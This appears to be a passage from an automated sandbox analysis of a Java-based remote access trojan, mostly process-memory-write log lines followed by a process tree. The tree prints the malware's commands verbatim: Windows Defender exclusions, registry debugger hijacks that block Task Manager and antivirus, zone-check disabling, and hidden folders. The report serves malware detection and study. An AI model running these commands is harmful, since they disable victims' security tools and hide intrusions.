cmd.exe 201 PID 1116 wrote to memory of 432 1116 java.exe 202 PID 1116 wrote to memory of 432 1116 java.exe 202 PID 1116 wrote to memory of 432 1116 java.exe 202 PID 432 wrote to memory of 1332 432 cmd.exe 203 PID 432 wrote to memory of 1332 432 cmd.exe 203 PID 432 wrote to memory of 1332 432 cmd.exe 203 PID 1116 wrote to memory of 1204 1116 java.exe 204 PID 1116 wrote to memory of 1204 1116 java.exe 204 PID 1116 wrote to memory of 1204 1116 java.exe 204 PID 432 wrote to memory of 560 432 cmd.exe 205 PID 432 wrote to memory of 560 432 cmd.exe 205 PID 432 wrote to memory of 560 432 cmd.exe 205 PID 1116 wrote to memory of 2036 1116 java.exe 207 PID 1116 wrote to memory of 2036 1116 java.exe 207 PID 1116 wrote to memory of 2036 1116 java.exe 207 PID 2036 wrote to memory of 268 2036 cmd.exe 208 PID 2036 wrote to memory of 268 2036 cmd.exe 208 PID 2036 wrote to memory of 268 2036 cmd.exe 208 PID 2036 wrote to memory of 1736 2036 cmd.exe 209 PID 2036 wrote to memory of 1736 2036 cmd.exe 209 PID 2036 wrote to memory of 1736 2036 cmd.exe 209 PID 1116 wrote to memory of 972 1116 java.exe 210 PID 1116 wrote to memory of 972 1116 java.exe 210 PID 1116 wrote to memory of 972 1116 java.exe 210 PID 972 wrote to memory of 1140 972 cmd.exe 211 PID 972 wrote to memory of 1140 972 cmd.exe 211 PID 972 wrote to memory of 1140 972 cmd.exe 211 PID 972 wrote to memory of 1708 972 cmd.exe 212 PID 972 wrote to memory of 1708 972 cmd.exe 212 PID 972 wrote to memory of 1708 972 cmd.exe 212 PID 1116 wrote to memory of 1984 1116 java.exe 213 PID 1116 wrote to memory of 1984 1116 java.exe 213 PID 1116 wrote to memory of 1984 1116 java.exe 213 PID 1984 wrote to memory of 2040 1984 cmd.exe 214 PID 1984 wrote to memory of 2040 1984 cmd.exe 214 PID 1984 wrote to memory of 2040 1984 cmd.exe 214 PID 1984 wrote to memory of 1636 1984 cmd.exe 215 PID 1984 wrote to memory of 1636 1984 cmd.exe 215 PID 1984 wrote to memory of 1636 1984 cmd.exe 215 PID 1116 wrote to memory of 1924 1116 java.exe 216 PID 1116 wrote to memory of 1924 1116 java.exe 216 PID 1116 wrote to memory of 1924 1116 java.exe 216 PID 1924 wrote to memory of 1836 1924 cmd.exe 217 PID 1924 wrote to memory of 1836 1924 cmd.exe 217 PID 1924 wrote to memory of 1836 1924 cmd.exe 217 PID 1924 wrote to memory of 1196 1924 cmd.exe 218 PID 1924 wrote to memory of 1196 1924 cmd.exe 218 PID 1924 wrote to memory of 1196 1924 cmd.exe 218 PID 1116 wrote to memory of 1176 1116 java.exe 219 PID 1116 wrote to memory of 1176 1116 java.exe 219 PID 1116 wrote to memory of 1176 1116 java.exe 219 PID 1176 wrote to memory of 528 1176 cmd.exe 220 PID 1176 wrote to memory of 528 1176 cmd.exe 220 PID 1176 wrote to memory of 528 1176 cmd.exe 220 PID 1176 wrote to memory of 1072 1176 cmd.exe 221 PID 1176 wrote to memory of 1072 1176 cmd.exe 221 PID 1176 wrote to memory of 1072 1176 cmd.exe 221 PID 1116 wrote to memory of 1428 1116 java.exe 222 PID 1116 wrote to memory of 1428 1116 java.exe 222 PID 1116 wrote to memory of 1428 1116 java.exe 222 PID 1428 wrote to memory of 536 1428 cmd.exe 223 PID 1428 wrote to memory of 536 1428 cmd.exe 223 PID 1428 wrote to memory of 536 1428 cmd.exe 223 PID 1428 wrote to memory of 1884 1428 cmd.exe 224 PID 1428 wrote to memory of 1884 1428 cmd.exe 224 PID 1428 wrote to memory of 1884 1428 cmd.exe 224 PID 1116 wrote to memory of 548 1116 java.exe 225 PID 1116 wrote to memory of 548 1116 java.exe 225 PID 1116 wrote to memory of 548 1116 java.exe 225 PID 1116 wrote to memory of 2032 1116 java.exe 226 PID 1116 wrote to memory of 2032 1116 java.exe 226 PID 1116 wrote to memory of 2032 1116 java.exe 226 PID 548 wrote to memory of 1948 548 cmd.exe 228 PID 548 wrote to memory of 1948 548 cmd.exe 228 PID 548 wrote to memory of 1948 548 cmd.exe 228 PID 548 wrote to memory of 560 548 cmd.exe 229 PID 548 wrote to memory of 560 548 cmd.exe 229 PID 548 wrote to memory of 560 548 cmd.exe 229 PID 1116 wrote to memory of 936 1116 java.exe 230 PID 1116 wrote to memory of 936 1116 java.exe 230 PID 1116 wrote to memory of 936 1116 java.exe 230 PID 936 wrote to memory of 1952 936 cmd.exe 231 PID 936 wrote to memory of 1952 936 cmd.exe 231 PID 936 wrote to memory of 1952 936 cmd.exe 231 PID 936 wrote to memory of 268 936 cmd.exe 232 PID 936 wrote to memory of 268 936 cmd.exe 232 PID 936 wrote to memory of 268 936 cmd.exe 232 PID 1116 wrote to memory of 388 1116 java.exe 233 PID 1116 wrote to memory of 388 1116 java.exe 233 PID 1116 wrote to memory of 388 1116 java.exe 233 PID 388 wrote to memory of 1972 388 cmd.exe 234 PID 388 wrote to memory of 1972 388 cmd.exe 234 PID 388 wrote to memory of 1972 388 cmd.exe 234 PID 388 wrote to memory of 1708 388 cmd.exe 235 PID 388 wrote to memory of 1708 388 cmd.exe 235 PID 388 wrote to memory of 1708 388 cmd.exe 235 PID 1116 wrote to memory of 684 1116 java.exe 236 PID 1116 wrote to memory of 684 1116 java.exe 236 PID 1116 wrote to memory of 684 1116 java.exe 236 PID 684 wrote to memory of 616 684 cmd.exe 237 PID 684 wrote to memory of 616 684 cmd.exe 237 PID 684 wrote to memory of 616 684 cmd.exe 237 PID 684 wrote to memory of 1988 684 cmd.exe 238 PID 684 wrote to memory of 1988 684 cmd.exe 238 PID 684 wrote to memory of 1988 684 cmd.exe 238 PID 1116 wrote to memory of 1836 1116 java.exe 239 PID 1116 wrote to memory of 1836 1116 java.exe 239 PID 1116 wrote to memory of 1836 1116 java.exe 239 PID 1836 wrote to memory of 1976 1836 cmd.exe 240 PID 1836 wrote to memory of 1976 1836 cmd.exe 240 PID 1836 wrote to memory of 1976 1836 cmd.exe 240 PID 1836 wrote to memory of 812 1836 cmd.exe 241 PID 1836 wrote to memory of 812 1836 cmd.exe 241 PID 1836 wrote to memory of 812 1836 cmd.exe 241 PID 1116 wrote to memory of 1072 1116 java.exe 242 PID 1116 wrote to memory of 1072 1116 java.exe 242 PID 1116 wrote to memory of 1072 1116 java.exe 242 PID 1072 wrote to memory of 1248 1072 cmd.exe 243 PID 1072 wrote to memory of 1248 1072 cmd.exe 243 PID 1072 wrote to memory of 1248 1072 cmd.exe 243 PID 1072 wrote to memory of 756 1072 cmd.exe 244 PID 1072 wrote to memory of 756 1072 cmd.exe 244 PID 1072 wrote to memory of 756 1072 cmd.exe 244 PID 1116 wrote to memory of 1224 1116 java.exe 245 PID 1116 wrote to memory of 1224 1116 java.exe 245 PID 1116 wrote to memory of 1224 1116 java.exe 245 PID 1224 wrote to memory of 1332 1224 cmd.exe 246 PID 1224 wrote to memory of 1332 1224 cmd.exe 246 PID 1224 wrote to memory of 1332 1224 cmd.exe 246 PID 1224 wrote to memory of 1076 1224 cmd.exe 247 PID 1224 wrote to memory of 1076 1224 cmd.exe 247 PID 1224 wrote to memory of 1076 1224 cmd.exe 247 PID 1116 wrote to memory of 1400 1116 java.exe 248 PID 1116 wrote to memory of 1400 1116 java.exe 248 PID 1116 wrote to memory of 1400 1116 java.exe 248 PID 1400 wrote to memory of 1464 1400 cmd.exe 249 PID 1400 wrote to memory of 1464 1400 cmd.exe 249 PID 1400 wrote to memory of 1464 1400 cmd.exe 249 PID 1400 wrote to memory of 1996 1400 cmd.exe 250 PID 1400 wrote to memory of 1996 1400 cmd.exe 250 PID 1400 wrote to memory of 1996 1400 cmd.exe 250 PID 1116 wrote to memory of 1232 1116 java.exe 251 PID 1116 wrote to memory of 1232 1116 java.exe 251 PID 1116 wrote to memory of 1232 1116 java.exe 251 PID 1232 wrote to memory of 1736 1232 cmd.exe 252 PID 1232 wrote to memory of 1736 1232 cmd.exe 252 PID 1232 wrote to memory of 1736 1232 cmd.exe 252 PID 1232 wrote to memory of 268 1232 cmd.exe 253 PID 1232 wrote to memory of 268 1232 cmd.exe 253 PID 1232 wrote to memory of 268 1232 cmd.exe 253 PID 1116 wrote to memory of 1140 1116 java.exe 254 PID 1116 wrote to memory of 1140 1116 java.exe 254 PID 1116 wrote to memory of 1140 1116 java.exe 254 PID 1140 wrote to memory of 2028 1140 cmd.exe 255 PID 1140 wrote to memory of 2028 1140 cmd.exe 255 PID 1140 wrote to memory of 2028 1140 cmd.exe 255 PID 1140 wrote to memory of 1956 1140 cmd.exe 256 PID 1140 wrote to memory of 1956 1140 cmd.exe 256 PID 1140 wrote to memory of 1956 1140 cmd.exe 256 PID 1116 wrote to memory of 616 1116 java.exe 257 PID 1116 wrote to memory of 616 1116 java.exe 257 PID 1116 wrote to memory of 616 1116 java.exe 257 PID 616 wrote to memory of 1196 616 cmd.exe 258 PID 616 wrote to memory of 1196 616 cmd.exe 258 PID 616 wrote to memory of 1196 616 cmd.exe 258 PID 616 wrote to memory of 1640 616 cmd.exe 259 PID 616 wrote to memory of 1640 616 cmd.exe 259 PID 616 wrote to memory of 1640 616 cmd.exe 259 PID 1116 wrote to memory of 812 1116 java.exe 260 PID 1116 wrote to memory of 812 1116 java.exe 260 PID 1116 wrote to memory of 812 1116 java.exe 260 PID 812 wrote to memory of 1068 812 cmd.exe 261 PID 812 wrote to memory of 1068 812 cmd.exe 261 PID 812 wrote to memory of 1068 812 cmd.exe 261 PID 1116 wrote to memory of 1884 1116 java.exe 262 PID 1116 wrote to memory of 1884 1116 java.exe 262 PID 1116 wrote to memory of 1884 1116 java.exe 262 PID 812 wrote to memory of 560 812 cmd.exe 264 PID 812 wrote to memory of 560 812 cmd.exe 264 PID 812 wrote to memory of 560 812 cmd.exe 264 PID 1116 wrote to memory of 2020 1116 java.exe 265 PID 1116 wrote to memory of 2020 1116 java.exe 265 PID 1116 wrote to memory of 2020 1116 java.exe 265 PID 2020 wrote to memory of 1584 2020 cmd.exe 266 PID 2020 wrote to memory of 1584 2020 cmd.exe 266 PID 2020 wrote to memory of 1584 2020 cmd.exe 266 PID 2020 wrote to memory of 1892 2020 cmd.exe 267 PID 2020 wrote to memory of 1892 2020 cmd.exe 267 PID 2020 wrote to memory of 1892 2020 cmd.exe 267 PID 1116 wrote to memory of 2040 1116 java.exe 268 PID 1116 wrote to memory of 2040 1116 java.exe 268 PID 1116 wrote to memory of 2040 1116 java.exe 268 PID 2040 wrote to memory of 2028 2040 cmd.exe 269 PID 2040 wrote to memory of 2028 2040 cmd.exe 269 PID 2040 wrote to memory of 2028 2040 cmd.exe 269 PID 2040 wrote to memory of 1988 2040 cmd.exe 270 PID 2040 wrote to memory of 1988 2040 cmd.exe 270 PID 2040 wrote to memory of 1988 2040 cmd.exe 270 PID 1116 wrote to memory of 528 1116 java.exe 271 PID 1116 wrote to memory of 528 1116 java.exe 271 PID 1116 wrote to memory of 528 1116 java.exe 271 PID 528 wrote to memory of 1640 528 cmd.exe 272 PID 528 wrote to memory of 1640 528 cmd.exe 272 PID 528 wrote to memory of 1640 528 cmd.exe 272 PID 528 wrote to memory of 332 528 cmd.exe 273 PID 528 wrote to memory of 332 528 cmd.exe 273 PID 528 wrote to memory of 332 528 cmd.exe 273 PID 1116 wrote to memory of 992 1116 java.exe 274 PID 1116 wrote to memory of 992 1116 java.exe 274 PID 1116 wrote to memory of 992 1116 java.exe 274 PID 992 wrote to memory of 560 992 cmd.exe 275 PID 992 wrote to memory of 560 992 cmd.exe 275 PID 992 wrote to memory of 560 992 cmd.exe 275 PID 992 wrote to memory of 1736 992 cmd.exe 276 PID 992 wrote to memory of 1736 992 cmd.exe 276 PID 992 wrote to memory of 1736 992 cmd.exe 276 PID 1116 wrote to memory of 1952 1116 java.exe 277 PID 1116 wrote to memory of 1952 1116 java.exe 277 PID 1116 wrote to memory of 1952 1116 java.exe 277 PID 1952 wrote to memory of 1948 1952 cmd.exe 278 PID 1952 wrote to memory of 1948 1952 cmd.exe 278 PID 1952 wrote to memory of 1948 1952 cmd.exe 278 PID 1952 wrote to memory of 756 1952 cmd.exe 279 PID 1952 wrote to memory of 756 1952 cmd.exe 279 PID 1952 wrote to memory of 756 1952 cmd.exe 279 PID 1116 wrote to memory of 1584 1116 java.exe 280 PID 1116 wrote to memory of 1584 1116 java.exe 280 PID 1116 wrote to memory of 1584 1116 java.exe 280 PID 1584 wrote to memory of 1404 1584 cmd.exe 281 PID 1584 wrote to memory of 1404 1584 cmd.exe 281 PID 1584 wrote to memory of 1404 1584 cmd.exe 281 PID 1584 wrote to memory of 324 1584 cmd.exe 282 PID 1584 wrote to memory of 324 1584 cmd.exe 282 PID 1584 wrote to memory of 324 1584 cmd.exe 282 PID 1116 wrote to memory of 1988 1116 java.exe 283 PID 1116 wrote to memory of 1988 1116 java.exe 283 PID 1116 wrote to memory of 1988 1116 java.exe 283 PID 1988 wrote to memory of 536 1988 cmd.exe 284 PID 1988 wrote to memory of 536 1988 cmd.exe 284 PID 1988 wrote to memory of 536 1988 cmd.exe 284 PID 1988 wrote to memory of 2016 1988 cmd.exe 285 PID 1988 wrote to memory of 2016 1988 cmd.exe 285 PID 1988 wrote to memory of 2016 1988 cmd.exe 285 PID 1116 wrote to memory of 1468 1116 java.exe 286 PID 1116 wrote to memory of 1468 1116 java.exe 286 PID 1116 wrote to memory of 1468 1116 java.exe 286 PID 1468 wrote to memory of 560 1468 cmd.exe 287 PID 1468 wrote to memory of 560 1468 cmd.exe 287 PID 1468 wrote to memory of 560 1468 cmd.exe 287 PID 1468 wrote to memory of 1332 1468 cmd.exe 288 PID 1468 wrote to memory of 1332 1468 cmd.exe 288 PID 1468 wrote to memory of 1332 1468 cmd.exe 288 PID 1116 wrote to memory of 1972 1116 java.exe 289 PID 1116 wrote to memory of 1972 1116 java.exe 289 PID 1116 wrote to memory of 1972 1116 java.exe 289 PID 1972 wrote to memory of 756 1972 cmd.exe 290 PID 1972 wrote to memory of 756 1972 cmd.exe 290 PID 1972 wrote to memory of 756 1972 cmd.exe 290 PID 1972 wrote to memory of 1956 1972 cmd.exe 291 PID 1972 wrote to memory of 1956 1972 cmd.exe 291 PID 1972 wrote to memory of 1956 1972 cmd.exe 291 PID 1116 wrote to memory of 2028 1116 java.exe 292 PID 1116 wrote to memory of 2028 1116 java.exe 292 PID 1116 wrote to memory of 2028 1116 java.exe 292 PID 2028 wrote to memory of 1640 2028 cmd.exe 293 PID 2028 wrote to memory of 1640 2028 cmd.exe 293 PID 2028 wrote to memory of 1640 2028 cmd.exe 293 PID 2028 wrote to memory of 536 2028 cmd.exe 294 PID 2028 wrote to memory of 536 2028 cmd.exe 294 PID 2028 wrote to memory of 536 2028 cmd.exe 294 PID 1116 wrote to memory of 2032 1116 java.exe 295 PID 1116 wrote to memory of 2032 1116 java.exe 295 PID 1116 wrote to memory of 2032 1116 java.exe 295 PID 2032 wrote to memory of 1932 2032 cmd.exe 296 PID 2032 wrote to memory of 1932 2032 cmd.exe 296 PID 2032 wrote to memory of 1932 2032 cmd.exe 296 PID 2032 wrote to memory of 1332 2032 cmd.exe 297 PID 2032 wrote to memory of 1332 2032 cmd.exe 297 PID 2032 wrote to memory of 1332 2032 cmd.exe 297 PID 1116 wrote to memory of 1892 1116 java.exe 298 PID 1116 wrote to memory of 1892 1116 java.exe 298 PID 1116 wrote to memory of 1892 1116 java.exe 298 PID 1892 wrote to memory of 2044 1892 cmd.exe 299 PID 1892 wrote to memory of 2044 1892 cmd.exe 299 PID 1892 wrote to memory of 2044 1892 cmd.exe 299 PID 1892 wrote to memory of 1076 1892 cmd.exe 300 PID 1892 wrote to memory of 1076 1892 cmd.exe 300 PID 1892 wrote to memory of 1076 1892 cmd.exe 300 PID 1116 wrote to memory of 1640 1116 java.exe 301 PID 1116 wrote to memory of 1640 1116 java.exe 301 PID 1116 wrote to memory of 1640 1116 java.exe 301 PID 1640 wrote to memory of 1464 1640 cmd.exe 302 PID 1640 wrote to memory of 1464 1640 cmd.exe 302 PID 1640 wrote to memory of 1464 1640 cmd.exe 302 PID 1640 wrote to memory of 1636 1640 cmd.exe 303 PID 1640 wrote to memory of 1636 1640 cmd.exe 303 PID 1640 wrote to memory of 1636 1640 cmd.exe 303 PID 1116 wrote to memory of 1332 1116 java.exe 304 PID 1116 wrote to memory of 1332 1116 java.exe 304 PID 1116 wrote to memory of 1332 1116 java.exe 304 PID 1332 wrote to memory of 1956 1332 cmd.exe 305 PID 1332 wrote to memory of 1956 1332 cmd.exe 305 PID 1332 wrote to memory of 1956 1332 cmd.exe 305 PID 1332 wrote to memory of 924 1332 cmd.exe 306 PID 1332 wrote to memory of 924 1332 cmd.exe 306 PID 1332 wrote to memory of 924 1332 cmd.exe 306 PID 1116 wrote to memory of 560 1116 java.exe 307 PID 1116 wrote to memory of 560 1116 java.exe 307 PID 1116 wrote to memory of 560 1116 java.exe 307 PID 560 wrote to memory of 324 560 cmd.exe 308 PID 560 wrote to memory of 324 560 cmd.exe 308 PID 560 wrote to memory of 324 560 cmd.exe 308 PID 560 wrote to memory of 1620 560 cmd.exe 309 PID 560 wrote to memory of 1620 560 cmd.exe 309 PID 560 wrote to memory of 1620 560 cmd.exe 309 PID 1116 wrote to memory of 1884 1116 java.exe 310 PID 1116 wrote to memory of 1884 1116 java.exe 310 PID 1116 wrote to memory of 1884 1116 java.exe 310 PID 1884 wrote to memory of 656 1884 cmd.exe 311 PID 1884 wrote to memory of 656 1884 cmd.exe 311 PID 1884 wrote to memory of 656 1884 cmd.exe 311 PID 1884 wrote to memory of 2032 1884 cmd.exe 312 PID 1884 wrote to memory of 2032 1884 cmd.exe 312 PID 1884 wrote to memory of 2032 1884 cmd.exe 312 PID 1116 wrote to memory of 1436 1116 java.exe 313 PID 1116 wrote to memory of 1436 1116 java.exe 313 PID 1116 wrote to memory of 1436 1116 java.exe 313 PID 1436 wrote to memory of 1988 1436 cmd.exe 314 PID 1436 wrote to memory of 1988 1436 cmd.exe 314 PID 1436 wrote to memory of 1988 1436 cmd.exe 314 PID 1436 wrote to memory of 1708 1436 cmd.exe 315 PID 1436 wrote to memory of 1708 1436 cmd.exe 315 PID 1436 wrote to memory of 1708 1436 cmd.exe 315 PID 1116 wrote to memory of 528 1116 java.exe 316 PID 1116 wrote to memory of 528 1116 java.exe 316 PID 1116 wrote to memory of 528 1116 java.exe 316 PID 528 wrote to memory of 1996 528 cmd.exe 317 PID 528 wrote to memory of 1996 528 cmd.exe 317 PID 528 wrote to memory of 1996 528 cmd.exe 317 PID 528 wrote to memory of 1400 528 cmd.exe 318 PID 528 wrote to memory of 1400 528 cmd.exe 318 PID 528 wrote to memory of 1400 528 cmd.exe 318 PID 1116 wrote to memory of 276 1116 java.exe 319 PID 1116 wrote to memory of 276 1116 java.exe 319 PID 1116 wrote to memory of 276 1116 java.exe 319 PID 276 wrote to memory of 1232 276 cmd.exe 320 PID 276 wrote to memory of 1232 276 cmd.exe 320 PID 276 wrote to memory of 1232 276 cmd.exe 320 PID 276 wrote to memory of 1480 276 cmd.exe 321 PID 276 wrote to memory of 1480 276 cmd.exe 321 PID 276 wrote to memory of 1480 276 cmd.exe 321 PID 1116 wrote to memory of 936 1116 java.exe 322 PID 1116 wrote to memory of 936 1116 java.exe 322 PID 1116 wrote to memory of 936 1116 java.exe 322 PID 1116 wrote to memory of 704 1116 java.exe 323 PID 1116 wrote to memory of 704 1116 java.exe 323 PID 1116 wrote to memory of 704 1116 java.exe 323 PID 704 wrote to memory of 548 704 cmd.exe 325 PID 704 wrote to memory of 548 704 cmd.exe 325 PID 704 wrote to memory of 548 704 cmd.exe 325 PID 704 wrote to memory of 2036 704 cmd.exe 326 PID 704 wrote to memory of 2036 704 cmd.exe 326 PID 704 wrote to memory of 2036 704 cmd.exe 326 PID 1116 wrote to memory of 1952 1116 java.exe 327 PID 1116 wrote to memory of 1952 1116 java.exe 327 PID 1116 wrote to memory of 1952 1116 java.exe 327 PID 1952 wrote to memory of 824 1952 cmd.exe 328 PID 1952 wrote to memory of 824 1952 cmd.exe 328 PID 1952 wrote to memory of 824 1952 cmd.exe 328 PID 1952 wrote to memory of 1992 1952 cmd.exe 329 PID 1952 wrote to memory of 1992 1952 cmd.exe 329 PID 1952 wrote to memory of 1992 1952 cmd.exe 329 PID 1116 wrote to memory of 1464 1116 java.exe 330 PID 1116 wrote to memory of 1464 1116 java.exe 330 PID 1116 wrote to memory of 1464 1116 java.exe 330 PID 1116 wrote to memory of 812 1116 java.exe 332 PID 1116 wrote to memory of 812 1116 java.exe 332 PID 1116 wrote to memory of 812 1116 java.exe 332 PID 1116 wrote to memory of 1584 1116 java.exe 334 PID 1116 wrote to memory of 1584 1116 java.exe 334 PID 1116 wrote to memory of 1584 1116 java.exe 334 PID 1116 wrote to memory of 1400 1116 java.exe 336 PID 1116 wrote to memory of 1400 1116 java.exe 336 PID 1116 wrote to memory of 1400 1116 java.exe 336 PID 1116 wrote to memory of 1124 1116 java.exe 338 PID 1116 wrote to memory of 1124 1116 java.exe 338 PID 1116 wrote to memory of 1124 1116 java.exe 338 PID 1116 wrote to memory of 936 1116 java.exe 340 PID 1116 wrote to memory of 936 1116 java.exe 340 PID 1116 wrote to memory of 936 1116 java.exe 340 PID 1116 wrote to memory of 1956 1116 java.exe 342 PID 1116 wrote to memory of 1956 1116 java.exe 342 PID 1116 wrote to memory of 1956 1116 java.exe 342 PID 1116 wrote to memory of 656 1116 java.exe 344 PID 1116 wrote to memory of 656 1116 java.exe 344 PID 1116 wrote to memory of 656 1116 java.exe 344 PID 1116 wrote to memory of 2020 1116 java.exe 346 PID 1116 wrote to memory of 2020 1116 java.exe 346 PID 1116 wrote to memory of 2020 1116 java.exe 346 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 396 attrib.exe 1124 attrib.exe 796 attrib.exe 1248 attrib.exe 1224 attrib.exe 792 attrib.exe 536 attrib.exe 684 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\08028.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:396
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1124
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hHEiU\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:796
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hHEiU\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1248
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hHEiU2⤵
- Views/modifies file attributes
PID:1224
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hHEiU2⤵
- Views/modifies file attributes
PID:792
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\hHEiU2⤵
- Views/modifies file attributes
PID:536
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\hHEiU\RAvDP.class2⤵
- Views/modifies file attributes
PID:684
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hHEiU','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hHEiU\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:656
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:848
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2032
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1480
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1984
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1960
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1940
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:744
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:328
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:972
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:524
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:2036
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1436
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:2008
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2032
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1012
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1876
-
-
